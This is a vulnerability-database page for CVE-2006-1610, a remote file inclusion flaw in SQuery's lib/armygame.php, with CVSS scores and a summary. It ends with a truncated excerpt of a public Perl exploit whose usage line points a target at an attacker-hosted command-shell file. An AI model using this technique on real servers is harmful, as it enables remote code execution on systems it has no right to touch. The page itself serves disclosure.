5.1
CVSSv2

CVE-2006-1610

Published: 04/04/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in lib/armygame.php in SQuery 4.5 and previous versions, as used in products such as Autonomous LAN party (ALP), allows remote malicious users to execute arbitrary PHP code via a URL in the libpath parameter. NOTE: this only occurs when register_globals is disabled.

Vulnerable Product Search on Vulmon Subscribe to Product

squery squery

Exploits

#!/usr/bin/perl ## # SQuery <= 45 Remote File Inclusion Exploit # Bug Found By uid0 code by zod ## # (c) 2006 # ExploiterCodecom ## # usage: # perl squerypl <location of SQuery> <cmd shell location> <cmd shell variable> # # perl squerypl sitecom/SQuery/ sitecom/cmdtxt cmd # # cmd shell example: <?passth ...